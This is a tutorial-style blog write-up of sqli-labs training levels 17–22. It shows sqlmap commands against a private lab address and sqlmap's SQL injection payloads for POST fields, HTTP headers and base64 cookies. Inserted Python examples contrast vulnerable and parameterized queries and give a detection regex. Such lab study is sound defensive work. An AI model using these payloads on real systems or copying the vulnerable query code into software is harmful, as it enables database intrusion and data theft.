Contents
- 17. less17 - Update Query - Error based - String
- 18. less18 - Header Injection - Error Based - string
- 19. less19 - Header Injection - Referer - Error Based - string
- 20. less20 - Cookie Injection - Error Based - string
- 21. less21 - Cookie Injection - Error Based - complex - string
- 22. less22 - Cookie Injection - Error Based - Double Quotes
17. less17 - Update Query - Error based - String
In this level the uname parameter goes through the check_input() filter, so if we run sqlmap the same way as before we will find that it is very likely to run for a very long time: uname is not injectable, so sqlmap tries every technique it has on it, and that takes ages. The other parameter, passwd, is not filtered, so when injecting we specify that parameter explicitly.
This level is otherwise the same as level 11, so I will not repeat the individual statements.
The sqlmap command used is:
```
C:\Python27\sqlmap>sqlmap.py -r "C:\Users\20544\Desktop\sqlmap.txt" --level=5 --risk=3 -p "passwd"
```
Tip: the first time I ran it nothing came out. While injecting by hand I found that the uname parameter has to be an existing user, otherwise whatever you put into passwd just produces an error. So uname must be correct, and passwd can be anything. See the figure below:
Below is the payload given by sqlmap:
```
sqlmap identified the following injection point(s) with a total of 1766 HTTP(s) requests:
Parameter: passwd (POST)
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: uname=admin&passwd=11' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170766271,(SELECT (ELT(6944=6944,1))),0x717a7a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- AKXd&submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin&passwd=11' AND (SELECT 7917 FROM (SELECT(SLEEP(5)))uuIs)
```
Levels 18 to 20 below are mainly about injection through HTTP headers.
For a detailed introduction to HTTP headers, see my other article:
https://blog.csdn.net/weixin_43901038/article/details/107640730
Although that article covers a lot about HTTP headers, the common places where HTTP header injection points arise are the following:
Referer, X-Forwarded-For, Cookie, X-Real-IP, Accept-Language, Authorization
The next few levels are a bit awkward: I tried every method and simply could not get them to run, and I do not know where the problem is. For the specific reference methods please see the link below; I will come back and fill this in once I have an idea!
Using sqlmap throughout the sqli-labs basic section without manual injection (a Qixi Festival gift!!!)
18. less18 - Header Injection - Error Based - string
This level passes both uname and passwd through the check_input() function, so injecting through uname or passwd will not work. But in the source we see an insert:
```php
// Less-18: the User-Agent header and the client IP are concatenated straight into the INSERT
$insert = "INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
```
It inserts the User-Agent and the IP into the database, so can we use this for injection?
Let's give it a try.
Um, I ran this with --level=5 --risk=3
and the fact is... it ran for nearly half an hour and never produced any result.
Um, fine, I give up... next time!!!
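As an added example (not code from this post or from sqli-labs), here is an in-memory SQLite model of the two statements discussed above: the Less-17 UPDATE, where uname is looked up safely but passwd is pasted into the query, and the Less-18 INSERT of the User-Agent and IP. Each vulnerable builder sits beside a parameterized version; the schema and column types are assumptions. It shows why a single quote in passwd or User-Agent surfaces a database error (the signal error-based detection relies on) and why the tip that uname must exist holds.

```python
import sqlite3

# Constructed in-memory stand-in for the sqli-labs `security` database used by
# Less-17 (users) and Less-18 (uagents); table layout and types are assumptions.
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 'admin');
CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT);
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def reset_password_vulnerable(conn, uname, passwd):
    # Less-17 shape: uname is looked up with a placeholder (the filtered parameter),
    # but passwd is pasted into the UPDATE text unfiltered.
    row = conn.execute("SELECT username FROM users WHERE username=?", (uname,)).fetchone()
    if row is None:
        return 0  # unknown user: the UPDATE never runs, so passwd is never parsed as SQL
    sql = f"UPDATE users SET password='{passwd}' WHERE username='{row[0]}'"
    return conn.execute(sql).rowcount  # a stray quote in passwd raises OperationalError


def reset_password_safe(conn, uname, passwd):
    # Hardened form: the placeholder keeps passwd as data whatever characters it holds.
    return conn.execute("UPDATE users SET password=? WHERE username=?", (passwd, uname)).rowcount


def log_uagent_vulnerable(conn, uagent, ip, uname):
    # Less-18 shape: User-Agent and client IP are pasted straight into the INSERT.
    conn.execute(f"INSERT INTO uagents (uagent, ip_address, username) "
                 f"VALUES ('{uagent}', '{ip}', '{uname}')")


def log_uagent_safe(conn, uagent, ip, uname):
    conn.execute("INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
                 (uagent, ip, uname))


def password_of(conn, uname):
    return conn.execute("SELECT password FROM users WHERE username=?", (uname,)).fetchone()[0]


def stored_uagents(conn):
    return [row[0] for row in conn.execute("SELECT uagent FROM uagents")]
```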
19. less19 - Header Injection - Referer - Error Based - string
20. less20 - Cookie Injection - Error Based - string
From the source code we can see that the cookie takes its value from username; when the page is refreshed, username is read back out of the cookie and used in the query.
In this level we inject through the cookie, so we need sqlmap's `--cookie` option to carry the injection.
The injection command for this level is:
```
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-20/" --cookie "uname=admin" --level=3
```
Below is the payload given by sqlmap:
```
sqlmap identified the following injection point(s) with a total of 2589 HTTP(s) requests:
Parameter: uname (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin' AND 2481=2481-- QeIx

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: uname=admin' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178706a71,(SELECT (ELT(1349=1349,1))),0x717a6b7a71,0x78))s), 8446744073709551610, 8446744073709551610)))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 7130 FROM (SELECT(SLEEP(5)))Wpnx)-- sDNU

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: uname=-2470' UNION ALL SELECT CONCAT(0x7178706a71,0x7668714d64484c644a426d63435446537a65435a494a505a5a527a415572564a4a66575a72465375,0x717a6b7a71),NULL,NULL
```
21. less21 - Cookie Injection - Error Based - complex - string
This level is similar to level 20, but the cookie value is base64-encoded. We can therefore use the `--tamper=base64encode` option to have sqlmap base64-encode its injection payloads.
The injection command is:
```
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-21/" --cookie "uname=admin" --level=3 --tamper=base64encode
```
Below is the payload given by sqlmap:
```
sqlmap identified the following injection point(s) with a total of 2622 HTTP(s) requests:
Parameter: uname (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin') AND 5812=5812 AND ('DZPG' LIKE 'DZPG

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: uname=admin') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176787171,(SELECT (ELT(1502=1502,1))),0x7171767871,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('kEGe' LIKE 'kEGe

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin') AND (SELECT 8779 FROM (SELECT(SLEEP(5)))DSbJ) AND ('hRvK' LIKE 'hRvK

    Type: UNION query
    Title: Generic UNION query (random number) - 3 columns
    Payload: uname=-4185') UNION ALL SELECT 8255,CONCAT(0x7176787171,0x614e724f4e4b685754644d6575435249534b4d6e7a794e47637171466756557a4f58666a6e6d7346,0x7171767871),8255
```
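As an added example from the defender's side (not code from this post, sqli-labs or sqlmap), here is a small request scanner that covers the header injection points listed for levels 18 to 20 and the base64-encoded cookie of levels 21 and 22: it parses a raw HTTP request, decodes cookie values that are clean base64, and flags the payload fragments that recur in the sqlmap output above. The request layout, the marker regex and the sample cookies are constructed for illustration.

```python
import base64
import re

# Header fields the post lists as injection points, plus User-Agent (stored by Less-18).
WATCHED_HEADERS = ("referer", "x-forwarded-for", "cookie", "x-real-ip",
                   "accept-language", "authorization", "user-agent")
# Fragments that recur in the sqlmap payloads reproduced in this post.
SQLI_MARKERS = re.compile(
    r"['\"]\)?\s*AND\b|\bUNION\s+ALL\s+SELECT\b|\bSLEEP\(\s*\d+|\bELT\(|0x[0-9a-f]{8,}|--\s",
    re.IGNORECASE)


def maybe_base64(value):
    """Decoded text if value is clean base64 (the Less-21/22 cookie encoding), else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None
    return text if text.isprintable() else None


def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def scan_request(raw):
    """Return (location, value) pairs for every watched field carrying an SQLi marker."""
    _, headers, body = parse_request(raw)
    candidates = [("body", body)]
    for name in (n for n in WATCHED_HEADERS if n in headers):
        candidates.append((name, headers[name]))
        if name == "cookie":  # Less-21/22 send cookie values base64-encoded: inspect decoded too
            for part in headers[name].split(";"):
                key, _, val = part.strip().partition("=")
                decoded = maybe_base64(val)
                if decoded is not None:
                    candidates.append((f"cookie:{key} (base64)", decoded))
    return [(loc, val) for loc, val in candidates if SQLI_MARKERS.search(val)]


# Constructed sample requests shaped like the Less-20 and Less-21 cookies shown above.
def build_request(cookie, body=""):
    return ("GET /Less-21/ HTTP/1.1\r\nHost: 192.168.1.177:40000\r\n"
            "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\nAccept-Language: en-US,en;q=0.9\r\n"
            f"Cookie: {cookie}\r\n\r\n{body}")

LESS20_COOKIE = "uname=admin' AND 2481=2481-- QeIx"
LESS21_COOKIE = "uname=" + base64.b64encode(b"admin') AND 5812=5812 AND ('DZPG' LIKE 'DZPG").decode()
```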
22. less22 - Cookie Injection - Error Based - Double Quotes
This level is similar to level 21, except that the cookie value is wrapped in double quotes.
The sqlmap injection command is:
```
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-22/" --cookie "uname=admin" --level=3 --tamper=base64encode
```
Below is the payload given by sqlmap:
```
sqlmap identified the following injection point(s) with a total of 2629 HTTP(s) requests:
Parameter: uname (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin" AND 5788=5788 AND "ZhRs"="ZhRs

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: uname=admin" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162716a71,(SELECT (ELT(5835=5835,1))),0x71766a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND "qffh"="qffh

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin" AND (SELECT 4753 FROM (SELECT(SLEEP(5)))zEdp) AND "wZxo"="wZxo

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: uname=-5156" UNION ALL SELECT NULL,CONCAT(0x7162716a71,0x73784a556468644e6d496c6a4d465573765670476174454c77754c6b6b42776f6c676e58736a6f7a,0x71766a7671),NULL
```